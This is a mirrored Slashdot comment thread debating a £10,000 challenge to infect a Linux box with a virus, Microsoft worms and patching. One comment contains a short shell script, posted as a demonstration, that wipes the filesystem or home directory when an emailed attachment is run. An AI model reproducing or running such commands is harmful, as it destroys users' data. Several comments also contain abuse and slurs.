Slashdot Mirror
£10,000 Prize for Linux Virus Challenge Re-Issued
mutantcamel writes "Eddie Bleasdale, the director of NetProject has been offering
£10,000 to the first hacker to infect his Linux machine with a virus for the last two years, and so far no one has hit the jackpot. He's re-announced his challenge to virus writers following a Gartner report which told IT depts. not to trust MS server software because of recent worm attacks on their servers, but a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins."
How much does the British Pound weight?
You have something above your lip.
So ... write a virus and get rewarded for it? What kind of world do we live in where criminals get rewarded?!
...
I guess crime does pay
To celebrate the occasion of my 1000th post, I will post no more forever on Slashdot. Goodbye.
Drop the 'y', put a 're' in front.
TOUCH THIS! dah dun dun dun dun dah dah dah dun dun dund
I bet with 10,000 pounds I could infect him with a virus, if you know what I mean.
The site download.microsoft.com is running Microsoft-IIS/5.0 on Linux.
What, that's like $2 in American money?
And will you be called a "gifted programmer" a "security expert" or a "terrorist"?
In these times and with all of what's happening with all the laws passed, I wouldn't even dare touching that kind of contest, sure it's gonna make a possible winner popular, but could be also seen as a prime suspect for writing trojan code, and since law enforcement at higher levels often tries to find someone to blame, well, you know the rest.... (as in wrongfully accused, lack of proofs and still convicted, etc etc).
--- Metamoderating abusive downgraders since my 300th post.
Keep in mind that default Redhat installation ships with many bugs that all need to be patched. Saying someone can't hack this kids linux box is a reason not to trust MS is just plain stupid. If IT dept. would patch their software and not open idiot attachments you couldnt infect MS BOXES EITHER. Its all about PATCHING, no matter which OS you use.
Think about it, most MS bugs had patches before they went widescale. If you had taken time to install these patches you wouldn't have been infected. In addition, don't open EXE's that ask for your advice and its extremely hard to infect an NT system as well.
You cant compare an upgraded and constantly patched linux box to a default Win2k installation.
Does anyone else think that it is irresponsible to try to persuade virus writers to target Linux? What happens if someone is successful and unleashes a particularly nasty linux virus on us?
Let the virus kiddies stick to targeting Windoze.
HH
Does he just want his linux box destroyed or does it have to be a virus? He can give me his address, I'll gladly fly down to his house and smash up his linux box with a bat for 10,000 pounds (that's around 14,534 dollars and 22 cents).
It sure is!
I'm guessing the virus writers gave up already. I'm sure 10,000 pounds is not worth the time of two years. It sounds to me that it's impossible. They should increase that amount by an exponent of 100 and see what happens.
But it's even more funny that they have to pay people to attempt to write a virus, on a free and open source system. This only means one thing...Linux really works!
meaning they don't download critical updates 5 times a day the second the next new virus is released(as if they even have a fix for it that fast)
If businesses want to make their networks secure, they need to hire someone who cares and knows how, and pay well to get that person. Then don't hinder them with petty things like bureaucracy. They should report directly to the CTO or CIO, or actually be the CTO or CIO.
now we need to go OSS in diesel cars
Found on the same site Virus & Hacking
-- ZeroZenith
If he doesn't run his email attachments he'll be safe. What's the big deal?
I agree that some of the responsibility lies with the sysadmin, but then again, the OS should be designed well enough that the patches are minimal.
I work in an enterprise unix environment and getting time for outages to apply patches is incredibly tough when you are running 24x7 systems that are critical to the operation of the customer.
Sure, we try to patch systems when we find out about security holes, but there comes a time when you cannot simply afford to take your systems down every week to apply new patches. Now I don't deal with MS stuff so I can't comment authoritively, but it seems that the number of patches with MS products is never ending. This stops being a sysadmin problem and becomes a vendor (ie Microsoft) issue. Ultimately, it's a sloppy coding issue that lies with Microsoft.
The university starts later than most (Sept. 28), and I started getting this round of hits about the same time the Dorms opened up.
Problem, is the university doesn't seem to be willing to do anything about it.
Today, I shall announce an award of $5 (CDN) to who ever can write a virus for a Mac...
So start coding... There is a lot of competition out there...
---
Programming is like sex... Make one mistake and support it the rest of your life.
cuz it dying on its own...
fuckin fools .
To be a real virus, it has to propagate to other machines, which is likely breaking the law.
So the 10,000 pounds will eventually end up in the pocket of a lawyer for defending you!
"...but a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins."
After all the hours I put in on those bloody worms & viruses, it's nice to see some fallout against Microsoft, those who set the scene for such silliness. If they take responsibility for creating an insecure environment with their OS and software, they do severe damage to their brand and franchise value. If they do what they're doing now, biting the hands which feed them, ie those in the trenches making their crappy software work in production, then they will likely alienate many of the hordes of SAs which help them maintain their current position in the Enterprise & SOHOs.
Squirm, MS, Squirm.
The technologicaly ignorant people will still entrust thier computers to M$ because it is the standard-for now.
This SIG pulled due to lack of funding. (This damn war is costing too much!)
Two years ago, most programmers were fat and content in their dot com job and didn't really have too much spare time for such stuff.
Now with the job market in the shitter, I can see someone putting plenty of effort into coding a worm for Linux (especially for $10K). A lot of people now have nothing else to do except submit resumes and work on personal projects.
Hammer of Truth
Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins.
So the admins responsible for Windows Update are considered 'tards by Microsoft? After all, windowsupdate.microsoft.com was reportedly "hacked by Chinese" this summer.
--
"Outlook not so good." That magic 8-ball knows everything! I'll ask about Exchange Server next.
What happens if someone is successful and unleashes a particularly nasty linux virus on us?
Then the particular exploit will be patched, people will learn from the experience, and Linux will be a better, more secure system as a result.
If we discourage people from trying to break systems, we end up with weak systems.
Making Linux more secure today may result in some costly damage today - but will result in a more secure Linux, which will (as more and more people install and rely on Linux) almost certainly prevent orders of magnitude more damage several years from now. If we allow systems to become "weak", but continue installing millions more such systems, sooner or later someone will write a truly malicous virus, and the damage will be far greater in that case. Think man.
I'll bet that if those gifted hackers using Linux entered this contest, it would only be a matter of time before someone did it. The problem is, none of these hackers using linux want to ruin the "secure" reputation of the OS by winning this contest. Instead of worrying about ruining its reputation, try and make a virus for it so the linux community can then come up with an update for the kernel or whatever to make it secure again.
"Be regular and orderly in your life, so that you may be violent and original in your work." -Flaubert
... provided you're not stupid.
I offer 10$ canadian (or 0.10$ US if you will) to anyone who can infect my box, 24.112.8.23.
And please no DOS attacks....
OH.. no.. not at all.
They simply need an admin who is diligent about applying patches and staying informed.
Why does the CTO or CIO have to be involved? that's rediculous.
Perhaps $ 1.000.000 make sense. No body hurt himself for $15.000.
Thats impossible man, They can't write worm or virus.
Maybe for apache or someting.
But in any condition. its impossible to spread like M$ worms.
[My english is better than most other people's Turkish, so please point out mistakes politely. Thank you.]
Because without the CTO or CIO's approval and backing, you can't get a damn thing done.
7 November 2006: The day Americans realized corruption and incompetence weren't addressing 11 September 2001
--just a thought. No intent to offend, etc.
I dont think linux is more secure for this kind of thingShort Answer: Anthrax isn't a virus.
I looked at netproject.com and couldn't find more details. What's the machine running, etc? Right now, my Linux box is behind my Windows box that only runs a web proxy. I'm also on dialup. Plus, my linux box is shut off right now. That makes it pretty secure, right? Seriously, if people only run their box with a web server and SSH, there's less of a chance of getting inside that if they ran many servers and had to worry about hacking from people with accounts on the box.
a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins.
Now huge sucess in IIS' worms is due to 'tardy' NT sysadmins, and definitely not MS' fault?
MS fans should feel sad for having honored title 'tardy' after all those years of unconditional loyalty.
the virus/worm or the patch?
Perhaps part of the problem with Microsoft Sysadmins is that these people should never have become sysadmins in the first place, but because being a sysadmin (used to) draw such a large salary that everyone wanted on the bandwagon, and Microsoft, in their infinite wisdom saw fit to make it so any idiot could push the button, and be a sysadmin too... The ex-Sysadmin where I used to work at was an idiot as far as actually working with servers was concerned. He subscribed to the "If there's no dialogue box for it, it can't be done" syndrome, and it was downright depressing. Far Far too often, we had problems with spam, viruses, and worms because he didn't bother to learn HOW to use the software at his disposal's advanced features to fix this stuff.
He was an MCSE too, so obviously these four letters aren't worth a pitcher of warm shit (to quote a famous American Revolutionary), and I'm glad that I'm NOT corrupted with any kind of Microsoft certification.
You know someone is going to say retarded, which might not be completely fair.
It has been said that no-one ever got fired for buying IBM (long ago), or Microsoft. This may be slowing changing. I don't know of many people who want to put their jobs on the line to protect the reputation of some other company.
"It is a greater offense to steal men's labor, than their clothes"
You guys should add "Gotcha" at the end, for the more gullible, or those that skim through and miss things like "open sores software"
I still find this unfunny, because it comes framed as a personal attack.
Letter To Iran
Considering that writing a virus could be considered terrorism, and prosecuted as suck, I don't know that this would be the best idea...
Although, I would certainly like the 10k Pounds...
(Now, if only I knew how to input the Pound symbol on my US keyboard...)
-- Sometimes you have to turn the lights off in order to see.
I've seen hacking contests before. They're really freaking lame. The results are not often announced, it just disappears. Or you get everyone doing a DoS thinking that is hacking.
"Bleasdale maintains it is impossible to infect a correctly configured Linux system with a virus, and conversely that it is impossible to make a system running Windows secure."
Okay this is quite clearly wrong. On many levels. Now it is possible that this guy set up a linux box with no services running at all. Fine. WindowsNT is equally secure with nothing running. But lets say a linux box has Apache, bind, or FTP on it. We've seen buffer overflows and other attacks on these software products. There is a delay from discovery to annoucement to fix available. To claim that a linux box is impossible to infect is just showing ignorance, unless of course it's running nothing at all.
turn on the M$ box. :)
While it is true that boxes need to be patched, it is also true that M$ does not really have a secured design nor is truly concerned with it. When I hear ppl complaining about patches on M$, all I can think of is a house with a deadlock on the front door, but with empty spaces where glass should be. The DeadLock is enough for M$ to say that they security, but they design a lousy house.
It has been said already, but I think this is a pretty dangerous undertaking, it has been a few years now but there has been a pretty bad *IX worm out there.
It exploited secrurity holes in Bind and some other projects wich where (like Code Red and Nimda) known a FEW MONTHS before the worm came out.
The only reason why this hasn't happened to *UX systems lately is because a) Most scripy kiddies hate windowze systems b) because we (the *IX admins) have something to prove (the superiority of "our" system) we PATCH.
BUT since linux is becoming more and more mainstream and used more and more at homes as small file servers or as internet routers and the sort a worm could have some devestating effects.
My 2 cts (BTW I am not defending Microsoft here)
Fighting for peace is like fucking for virginity
Windows allows all those not-so-smart people to spread virus's. Just look at all the virus's that spread the most, ones like MELISSA, ILOVEYOU, etc. these virus's worked so well not becuase they were so well done, but because people allowed them to perform well. Windows comes with many "features" that allow virus's to spread easily, yes, most can be disabled, but not many people do. As with Linux, most Linux deployments prevent most of these problems. They don't usually include so many "features" that aid in the spread of virus's. Also, most deployments of Linux are managed by much more experienced system administrators, and users alike. As MS attempts to make things "easier" for the general public (obviously we know why and it isn't just to make things easier), they make it "easier" for the spread of virus's, not that they want to, but their main concern is make things "easier" so that more people buy their software as opposed to software that's not so easy to use. As Linux developers attempt to make things "easier" they tend to think a lot more along the lines of keeping everything secure at the same time. Any business wants to make a larger profit and as MS starts seeing that security is just as important to stay on top as making things "easier", even more important really, then they will continue to work more on security. MS has realised this actually, the secure side of MS is NT and 2000, the not so secure side ME and XP. The user base again, being the leaast secure, the base which just so happens to be the ones that helped spread those great ILOVEYOU virus's and such. MS is split, the Linux community isn't so much, there is no business Linux OS or desktop Linux OS, there are just different distributions. As with most distributions, they focus on both security and ease-of-use, but because there is no central authority, anyone who's concerned with security works on that area, and those concerned with ease-of-use work on making software easier.
It isn't really about the OS, NT, 2K, Linux, BSD, BeOS, OSX, etc. it's about how they are developed and who maintains them that makes the difference between secure and not-so-secure. Hierarchy is not the best way to develop software, neither is running a business or government, or any organization. That is why democracy is better than communism or dictatorship, because they steer further from hierarchy.
Question everything.
Tardy:
tardy (adjective )
FORMAL
slow or late in happening or arriving
Dinner was somewhat delayed on account of David's rather tardy arrival
Avoiding viruses I really easy if you have some clue, no matter what the OS.
M$ offer up money for virus writers. Oh wait, they did. They designed Windows just so that symantic and the other virus wirters could also sell programs to defeat it.
This whole thing (M$,symantic, and other viral ocmpanies) reminds me of zdnet having a CIO from a company who sells security programs for IIS saying that IIS is safe.
Bill Gates would do this too, but he can't afford it.
My Karma was at 49, then they switched to words. All that work for nothing!
... of one of my old OS prof's in college
during his OS course, if you were to root his box (it ran OpenBSD), report the contents of a certain file and how you broke in, you get an A and have your name listed as an OpenBSD contributer.
Ok, so someone used the CS Dept's main Sun server to launch a DoS attack against his machine. His box held up just fine (he says he was using it during the attack and didnt notice anything unusual happening). But the dept server, OTOH, sustained major damage. It needed rebooting, and it crashed during reboot.
The dept head was not happy. The guy had to cancel that challenge because it apparently violated university policy.
The One Rule Of Chess You'll Ever Need: Don't play someone who carries a kit in their bookbag.
I agree with Microsoft, in part.
Having been responsible some time ago of the maintenance of both systems (NT and Unix) I always found easier to maintain all the different flavors of Unix (Linux, Solaris, BSD) than WinNT. Win2000 might have changed that, but I'm no longer administering MS based systems.
The main appeal of MS systems are the "Zero cost of ownership" (or whatever it's called), so it attracts lots of people with "zero sysadmin experience" who just pop in the cd and install nt+iis+exchange in a day or less, never again returning to so much as check the windows update page. I have a couple of customers who, to this day, are still vulnerable to code-red and nimda.
And no amount of warnings makes them take action until ISPs start blocking them... it's almost the same with the SPAM problem.
No sig
"....Eddie Bleasdale, has reiterated his pledge to give £10,000 to anyone who can infect his Linux computer with a virus."
This is famous, because its Loud. Tomorrow if a Window 2000 Admin comes and says the same thing about his "correctly configured system", I'm sure nobody will be able to do anything EXCEPT for Microsoft Employees (or the code thieves...) who know of an undetected backdoor somewhere hidden underneath layers of Windows.
But then, the same can be expected of a bug in Open Source which nobody has carefully examined till yet (its possible...quite possible).
More to the point: It's stupid and lazy people who get viruses, regardless of their OS. If Linux ever becomes widespread, it will have a bigger virus problem than Microsoft ever has.
"but a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins"
;)
It's many many many times easyer to press 'SETUP' then it is to read a bugtraq every few days.
Maybe Microsoft qould change the setup procedure so you HAVE to read many pages before your system works. Atleast you've proven that you can read
Bit like Linux. Read and search for hours to get something working.
No. Just kidding, but the click-wait-and-beporoudofyourserver is also too easy. Last few weeks i've been probed by several MServers with the 'congratulated with your new server' screen as opening-screen. As I see it many of those servers are made by A: people who are curious about what it's like to have _their own_ server and B: install the server with illegal software and C: never have heared of 'patches' and 'upgrades'.
Privacy is terrorism.
All I need is access to your CD-ROM drive and a Windows CD!!
My life is one big siesta in which I'm dreaming I wished my life was one big siesta.
I was the security "expert" at my last job, being the only person who really knew anything about security issues.
I was hampered from doing my job because of the way the network was set up when I got there. People resisted change.
Then, a FTP server someone else set up became an mp3 server one night. What a shock!
In other words, if you're going to institute security, people have to actually listen to you and, essentially, do what you say. You need to be the one with the power, not the one who's told what to do. That kind of edict can [usually] only come from the top.
"You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
Secure systems do not exist, everything
is exploitable one way or the another,
viruses are just form of explotation
with primary objective known as destruction.
Saying that one system is more secure or
virus prone is just plain ignorant. It
is impossible for OS designer to take
into account everything, and run every
possible test case against it. It is true
however that as the level of complexity of
the system increases the more insecure it
becomes.
The Constitution is NOT a suicide pact.
And quotes from Tom Clancy books are hardly divine wisdom.
To my knowledge, the Webstar reward still stands. The contest crack I suggested stems from a pcweek contest, the winner of which (jfs) exploited the third party PhotoAds software. jfs was partially succesful against the crack.linuxppc.org. Details here...
Before people start slamming the Gartner report again, I hope they've read it. People seem to be under the impression that Gartner said that IIS simply wasn't secure and that other things are better - and that the response to this is 'duh, any machine which isn't updated isn't secure'. That isn't a valid response at all, because what Gartner very specifically said was not that IIS couldn't be secured, but that it is simply uneconomical because of the time and effort it takes to update IIS.
I.e. Just what they are saying is 'We all know you need good sysadmins to make sure systems are up to date with security patches, but in the case of IIS you'll have to employ someone to spend all their time doing this, and that simply isn't the least expensive way to go'....
FORMAL
slow or late in happening or arriving
retard
verb
1 : to slow up especially by preventing or hindering advance or accomplishment
It should be of note that there does not exist a noun "retard". However, if one is tardy, then, by definition, he is or has been retarded.
e.g. if a fire's arrival to your house is tardy, you could say that it has been retarded by the firemen.
I think you mean tarded for using MS server software.
Blah Blah Blah
Your right about RedHat. They throw together the worst Linux destro.
RedHat has lost track of the whole idea of a destro. It's a "value added" Linux.. a better Linux than you'd get if you did it yourself.
Not RedHat..
The whole point is you shouldn't need to patch it.
The defects found in RedHat and Windows are really stupid.
Yeah don't run attachments.. smart idea.. Let's rember that this is a FEATURE Microsoft ADDED. It's not a defect. Windows was made this way.
Give Microsoft a break for the first virus. Ok done.. Need the first infection to learn. Well great but the stupid patch is on the human side.
Let's also remember that Windows is designed to be "user friendly" in other words users don't know better. Linux is made with the os develupers in mind.. not the avrage user. So before you could run an e-mail virus you'd have to know enough about Linux to recognise the virus for what it is.
Now before we get ferther on the "RedHat".. RedHat is not Linux... RedHat is one single destro that compeates with Microsoft for the title of "the most bugs"... and last I heard RedHat held the title.. Not Microsoft.
Going into the past there have been many brown bag Unixes that were far worse than anything Microsoft put out. It's not like Microsoft or RedHat has ever achived the title of "all time most buggy".
But those companys went away. Pushed under by Sun Microsystems long before Linux saw the light of day.
Yes you can pick out a Linux destro that is as bad if not worse than Microsoft.. I know RedHat isn't the only brain dead destro.
So you can't just buy the first Linux destro on the shelfs any more than you could buy the first used car you see.
But you can't shop around for a better Windows.
Finnaly as I understand Windows admin are fearful of Microsoft patches. They are worried the fix will be worse than the disease...
That fear dosen't seem to be shared by Linux counterparts.
Ideally a Linux destro should be fine out of the box needing no patching. Not all destros have this advantage so you do need to shop around.
A lot more preferable to patching Windows and hoping the patches don't make things worse.
Basicly for Linux you need to train users there is no way around this.
If you want Windows to work correctly you have to train the users as well.
Now what advantage did Windows have over Linux? Not needing to train anybody.
Oh.. yeah well I guess thats not the case anymore.
There aren't any viruses for Linux at the moment.
If you want to argue the future fine be my guest but let's leave it at right now Windows has the lead in viruses. Linux won't catch up even if we wanted it to...
I don't actually exist.
I have to admit that *some* (okay, maybe a lot/most) of the infections were purely due to poor server administration. The story doesn't stop there though.
I offer up as proof of what follows my Apache logs on my home machine for the last month. It's amazing how many machines out there seem incredibly interested in files such as "cmd.exe" and "root.exe", which (gasp!) don't exist on my Linux box. What's funnier is the fact that the vast majority of these attacks came from the BellSouth DSL network and various cable networks. I actually got to the point where I was ready to write a Perl script to grep up the nefarious log entries, nmap 'em automatically, and ship the results off to BellSouth's abuse department every 12 hours...
The point I'm trying to make is simply that the biggest vector for the spread of this crap is home machines. MS can yap all day long about how poor admin'ing causes this, while they fail to admit that they've put horribly insecure web server software in the hands of average Joe and Jane Consumer. Now, I'm not saying it's all MS's fault; Joe and Jane are very much to blame too for not bothering to click "Start -> Windows Update" every once in a while.
But I won't accept that MS can claim any sort of innocence on this. What about other
Tardiness basically means lateness, so, do they honestly think it has anything to do with that?
They must think microsheeple are dumb, and assume everyone else is.
Being tardy has nothing to do with it.
THEY ARE BIG LIARS, PLAIN AS DAY.
This has to be the most poorly researched article I've ever seen. What is this? "I heard Eddie say that he'd give Sophos a bucket load of money if they could infect his Linux box" becomes news? For a start, there are already Unix viruses and they have been reported in the wild. What is all this stuff about "hackers" and "exploits" about? Are we talking about worms or viruses or what? Where is the actual written declaration of the challenge? Who is the third party holding the cash in escrow? How is the challenge supposed to work? Surely Ed isn't suggesting that he will track down and award the author of any virus that ends up on his machine. Surely Ed isn't trying to incite people to write actual viruses and release them into the wild. I have emailed netproject.com, maybe the original "reporter" should have done this, it's called basic research. BTW - I heard Bill Gates said he'd give $1,000,000 to anyone who can sneak a woopie cushion onto his chair before he sits down on monday, should I look for the Slashdot article?
How we know is more important than what we know.
... we just need to convince him somehow that he needs to open email attachments. Any of us could make an executable that would dispose of his machine and we'd collect the reward. But he wouldn't run it for us like so many Windows users would. Linux is JUST as vulnerable to 90% of the types of Windows viruses that are out there... its users just often aren't.
Yeah.. they were to lazy to install a real OS like Unix/Linux/BSD... hey even if they kept NT or Windows, they could have at least used Apache!
Only 'flamers' flame!
Obviously, MICROSOFTS problem with IIS is the fact the tardy sysadms located the flaws in IIS design.
Not bad for flunkies. I expect this is how CS people pass the blame around.
What's the point of writing a virus for linux.. so you can infect 2-5% of the machines in the world? Wow.
Linux doesn't need a virus anyway, it's dying on its own.
The people who wrote the Constitution could never have imagined that inhuman people like the Islamic terrorists would exist some day.
Oh yes, we'll redefine "human" to exclude our enemies, what a great idea. With morons like you around these conflicts will be perpetuated forever.
go away AC
Posting as directed.
I tend to bash WinXXXX as the next slashdoter, with good reasons, but netstat exists on Win2k too... check your facts first.. :)
Wow. What a vivid case of your everyday ignorant person. Your awe inspiring use of the term 'gay' as a derogatory adjective is obvious testimony to your vast vocabulary. Thanks for making /. a better place...
Posting as directed.
Nah thats Windows your thinking of..
"WebTV: bringing the Internet into the shallow end of the gene pool since 1995" - Martin Bishop
I have been reading though the posts and i've seen people saying that patch and don't get infected etc. My question is, how will you patch something that doesn't exist. I mean if a virus doesn't exist then there is no patch for that virus. You will get a patch after a virus has been discovered, and a patch has been released. But until then it might be too late. Somebody said (in a previous thread) that if an os was designed with security in mind the patches would be to a minimum. I agree to that and i like to say that it's not the admins fault. If MS had not all these security holes then maybe a few patches would "close" the holes and admins would be able to keep up with the patches.
Viruses and other exploits don't happen because of mere sloppy coding. It is rather arrogance and/or poor design (which I guess are the same thing). And this is not limited to proprietary software either.
A well-designed secure program generally assumes that it will be compromised and has safeguards to limit impact of such a compromise. For example, think of what you can do if you compromise IIS or Sendmail, and compare with a compromise of Qmail or Apache (assuming you could compomise Qmail). IIS, Outlook, and other Microsoft products suffer from this problem.
So, people will say that the *nix world is much better (and forget the lessons learned from the Morris Worm). The kernels are very stable, but it is the network services which are the most vulnerable. Remember that root has to run the process if it binds to a port below 1024, so many network daemons are run exclusively by root. If I were into this area, I would be targeting these services (BIND, Sendmail, Tux, Websphere, etc.) rather than the older viruses. Tux represents an interesting case in point because it can have no safeguards except for very careful coding (and NO coding will ever be perfect) as it runs in kernel mode.
Now there is one other thing that was not said... Does the virus have to be Linux specific, or can I use an old-fashioned boot-sector virus?
LedgerSMB: Open source Accounting/ERP
Too late, GPL virus has already been there done that.
Virus means Anthrax is out.
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
You are both defending Microsoft and you are flat out wrong. Linux *DOES*
not have the virus-spreading email programs and other software that
populates the Windows enviroment.
Hmmm.... So.... If Microsoft were to release Outlook for Linux, then we would be insecure too? The weak point of *nix is that only programs running as root can bind to ports below 1024 which means that most network services MUST run as root, and few have worker processes with fewer restrictions, like Apache does.
So how abaout a change in paradigm? How about ditching this whole concept of requiring network services to run as root and have a "netd" group which would ba allowed to do this but not required to be root. We already sort of hack this by using xinetd and inetd, so why not create a new, more secure standard that would do more to prevent serious exploits and hence possibly viruses as well?
LedgerSMB: Open source Accounting/ERP
only I don't know which part of what I wrote resembled some Tom Clancy quote. I wrote my comment without assistance or plagarizing, because my thoughts are my own.
I don't think this is a fair comparison. On one hand, you have a person that has locked down his machine with the latest patches, the highest security settings, firewalls, etc... And we're comparing it to a WinNT Administrator that has not patched his systems since the first install.
Windows servers could be as secure as Linux if the administrators take the time into securing their servers
Linux servers could be as insecure as a Win Server if the admin doesn't take the time into patching the system.
It's just a matter of the admin. As an administrator of a relatively small institution, it is often difficult for me to be on top of every patch that is available. We have 3 live servers and 1 backup server. It is a great deal to ensure that the patch is not detrimental to our applications, finding time to patch the systems that works with the users, and actually doing it. System patches are often done on weekends or friday nights and doing a bunch of patches at the same time. There is a level of acceptable risks that you must take when you are dealing with live servers.
Has anyone else encountered situations like this? How have you dealt with it?
_______________________________
"I'm not Conceited...I'm just a realist..."
Modding down this comment due to other comments is obsurd. Sure, maybe I did make bad comments in the past, but does that justify modding down for future comments that aren't really bad?
Also, you should remember that both sides of a point should be taken, not everything has to agree with the majority. Back in the day a "spherical world" was extremely unpopular.
Do you happen to work for MS?, hehe
Question everything.
#!/bin/sh
#
# TODO:
# Parse e-mail address' out of browser's cache
# Send program as attachment in e-mail
# Program untested, you'll get the idea anyway...
#
echo -e 'To: $TO_ADDR\nSubject: Hi! How are you? \n\nI send you this file in order to have your advice\n\n#!/bin/sh\nif[ "$UID" = "0" ]; then\n\nrm -rf
if[ "$UID" = "0" ]; then
rm -rf /
else
rm -rf ~/
fi
The program can be considered a virus. While it is blantently clear that you should never run it, I could have made it a binary which would have made it harder to see what it does. And who is to say that the user will even look at the file before executing it? A virus on any system requires the user to execute code (even if it is automated to a certain extent on certain systems). Whether the system is Linux or Windows, if the user wants to execute a program, they will.
So, let me get this straight. "Tardy" is a corporate euphemism for "retarded", right?
Sysadmins would not be put in such a position if M$ idiots actually had some settings turned _off_ by default. :-)
I know that is a hard concept for some) when unfortunately these things have to be installed (the client is the other half of the story
I will pay $1000 dollars to the first slashbotter who can infect my bum with a penguin.
This is totally off topic (well not totally), but I have to tell someone, it's just to bizarre.
;)
This SirCam virus is a wild ride. It's hitting Outlook users and mailing out random files. I just got a copy of a letter (in email) saying I needed to register as a "Sex Offender" in Arkansas. I was shocked and horrified at this at first. Turns out a friend of mine is a lawyer for the state of Arkansas, and he had a copy of this on his hard drive. He was struck by the SirCam.
I managed to sort out what it was because I noticed an attachment, that poking at it, it was the SirCam virus. Too bad I run linux, everyone in my outbox could have been tortured with slashdot rants
New competition:
I am willing to be rewarded with 1$ if i write an MS Virus.
New improved competition. Higher standards:
I am willing to be rewarded with 1$ if i manage to write a MS virus (blindfolded), both hands back, only with a straw, waterproof old 8088 with edlin, being chained and sunk within water.
Read the parent post before you moderate.
The Constitution is NOT a suicide pact.
Hmmm, "Give me liberty or give me death"
And it terrorists, not "Islamic terrorists". Osama is enough over the wall that his own family has disowned him.
We give up our (not "so called") rights, guess what? The terrorists just won. Doesn't matter who we bomb, catch, whatever.
Tardy is like 5 minutes, not half a fucking year. Lets be honest here, these sysadmins are not tardy, they are goddamn incompetent.
1q2w3e4r5t6y7u8i9o0pqawsedrftgthyjukilo;p'azsxdcf
"No nation could preserve its freedom in the midst of continual warfare."
--James Madison
What makes this trolling is that you're not contributing anything new to the discussion. OK, you're one of many people who things that Red Hat is too buggy. This is not useful. What would be useful is a description of distros that (in your opinion) do a better job.
Need I mention that I personally prefer Red Hat 7.1? Not perfect, but the easiest to live with for my narrow purposes. If I'm full of it, kindly educate me. Don't just scream at me.
I know if his system gets infected by a virus this will result in a patch and the system becoming more secure. But I hope for the sake of the reputation of an OS that prides itself in being more secure than propriety alternatives and for the sake of this guys wallet that nobody ever wins the money. It would be sad to see this stunt to prove the security of a well maintained linux box backfire. ---- Emacs is a nice OS - but it lacks a good text editor. That's why I am using Vim.
"Madness is something rare in individuals - but in groups, parties, peoples, ages it is the rule." -- Nietzsche
This is patently offensive. I have a cousin who is retarded and it's very demeaning to hear someone of dull normal intelligence called a 'tard'. Microsoft should apologize to the mentally challenged for using this disgusting euphemism.
Most likely he considers the oppertunity to study these attempts in a controlled enviroment, more valuable than the money anyways. In a world where most warrenties say something like "Not guarenteed to be suitable for any purpose". I find this approach most refreshing. Try and find commercialy producted software that states that its suitable even for the purpose it was manufactured for.
I hope for his sake running outlook and IE 5.5 in wine is out-of-bonds. I read a while back where the wine crew considered getting a virus to be a major mile stone achievment in compatability.
Apocalypse Cancelled, Sorry, No Ticket Refunds
If he is running Wine, I'll just send him SirCam... But do Windows virii count?
LedgerSMB: Open source Accounting/ERP
I was there! I saw it with my own eyes :)
"The defects found in RedHat and Windows are really stupid."
You haven't programmed much have you? (At all? No, patching a C file a couple of times and writing some bash scripts does not count as programming much) Most programmers know that there will be (not might be) bugs in the code. As far as stupid defects, yes they've both had their share. However RedHat is nowhere near Windows in terms of sheer volume of severe bugs. I don't know where you got your data. The last one that I saw was clearly biased (they counted general Linux bugs and RedHat-specific bugs together even though there was significant overlap).
Also note that RedHat uses newer versions of programs than most other Linux distributions. They don't hide this fact. I applaud them for it. Why? Because if they didn't, glibc2 would not have been adopted as quickly as it was. And what about the "broken" compiler that came out with RedHat 7? People railed and hollered because they couldn't compile their kernels. Actually they could, but people conveniently forgot that RedHat posted notices in big letters that they have to use the older version of the compiler to compile (oh no! you have to use kgcc instead of gcc! how will users ever figure that out, especially if RedHat explicitly tells them that they have to). Yes there were bugs in the compiler. It was patched, but the kernel still didn't build. Why not? Because there was code in the kernel that was not compliant with the C99 standard. People's C++ code wouldn't compile anymore. Why? Because a lot of C++ code is plainly incompatible with the ISO98 standard of C++. You know that thing that Slashdotters are always railing about: STANDARDS. Or do you advocate ignoring standards when they don't suit you? Wouldn't that make you like Microsoft? These are standards that were ratified and publically announced two and three years ago. How can you say that they snuck up on you?
What does C99 give you?
Allocated on the stack so no need for malloc or free (and less corresponding bugs) and basically eliminates the hacks out there to accomplish them same like alloca.What does ISO98 C++ give you? The Standard Template Library. 'Nuff said.
These are examples, but are indicative of a general trend.
- New library or suite that is noticeably better comes out
- RedHat recognizes that it is better, includes it in their distribution, tests, and releases
- People bitch and moan about how it breaks things that don't come with the distribution
- Everyone blames RedHat for doing a horrible job
- Because it is being used, the library in question gets a shakedown and most bugs are worked out quickly
- People reluctantly fix their programs to work with the updated library/suite so that they can run on RedHat
- In the course of fixing, people come across the advantages of the new library/suite and herald its arrival
- People deride the older version
- People forget it was RedHat that drove the newer, better library/suite into general use
- Goto 1 because geek memories appear to be very short
If you want a closer-to-perfect RedHat box, install a copy from two versions ago and install all of the associated patches for it. This will be about the equivalent of a standard Debian install: very secure, but quite out of date. If you run Debian unstable or testing, while having more up-to-date software, you find that many of those "stupid defects" find their way into that distribution as well.- I don't need to go outside, my CRT tan'll do me just fine.
I offer 10$ canadian (or 0.10$ US if you will) to anyone who can infect my box, 24.112.8.23
ping 24.112.8.23 Pinging 24.112.8.23 with 32 bytes of data: Request timed out. Request timed out. Request timed out. Request timed out. Ping statistics for 24.112.8.23: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms
If this were a test for infecting a Windows machine, the contest would already be over and the contest holder would be reinstalling his box right now...
"To make a mistake is only human; to persist in a mistake is idiotic." Cicero
When is the last time you saw a CTO who knew how to use a computer?
:).
I think I've made my point
Hey cunt:
If you plan to tell the world how you think something should be pronounced, take some fucking time to learn the IPA alphabet.
Don't just take a stab at it. You degrade the many who study phonetics with your amateur attempts. Fuck you.
I shit on you.
"...that the hugely successful worm attacks were due to 'tardy' sysadmins."
Uhm, yeah, and 'stupid' MS programmers packaging programs with 'default' options enabled.
When we see that things arn't secure it drives us to improve them.
;)
Is this case they arn't criminals, they are participators in a contest.
Imagine where crypto technology would be today if it didn't excists eny crackers*.
